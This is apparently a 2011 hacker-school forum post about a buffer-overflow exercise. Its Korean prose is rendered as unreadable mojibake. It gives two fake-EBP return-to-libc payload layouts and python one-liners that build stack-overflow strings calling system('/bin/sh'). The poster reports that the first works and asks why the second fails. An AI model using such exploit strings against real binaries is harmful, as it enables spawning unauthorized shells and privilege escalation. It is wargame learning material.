|
http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=3216 [º¹»ç]
¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
1) FAKE EBP¸¦ ¹öÆÛÀÇ ½ÃÀÛ ÁÖ¼Ò·Î ÇÏ¿© RTL ÇÏ¸é ¼º°ø
[ "AAAA" ] + [system()] + [exit()] + ["/bin/sh"] + [NOP*24] + [fake ebp:(buffer)] + [leave;let]
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\x90"*24 + "\xb0\xfa\xff\xbf" + "\x32\x85\x04\x08"')
¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ¢Æ
2) FAKE EBP¸¦ argv[2]·Î ÇÏ¿© RTL ÇÏ¸é ½ÇÆÐ.
ARGV[1]::([ "D"*40 ] + [fake ebp:(argv[2])] + [leave;ret])
ARGV[2]::(["AAAA"] + [system()] + [exit()] + ["/bin/sh"])
--------------------------------------------------------------------------------------------------------------
$(python -c 'print "D"*40 + "\x48\xfc\xff\xbf" + "\x32\x85\x04\x08"') $(python -c 'print "AAAA" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"')
¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬
¡Ø(À§ÀÇ leave;ret ÁÖ¼Ò´Â »çº» ÁÖ¼Ò ÀÔ´Ï´Ù)
¡Ø 1¹øÀº µÇ°í 2¹øÀº ¾ÈµË´Ï´Ù. (ÁÖ¼Ò°¡ Ʋ¸±½Ã Segmentation fault°¡ ³ªÁö¸¸ ¿¡·¯µµ ¾ø½À´Ï´Ù.)
ÀÌÀ¯¸¦ ¸ð¸£°Ú³×¿ä.
|
Hit : 3465 Date : 2011/06/11 07:18
|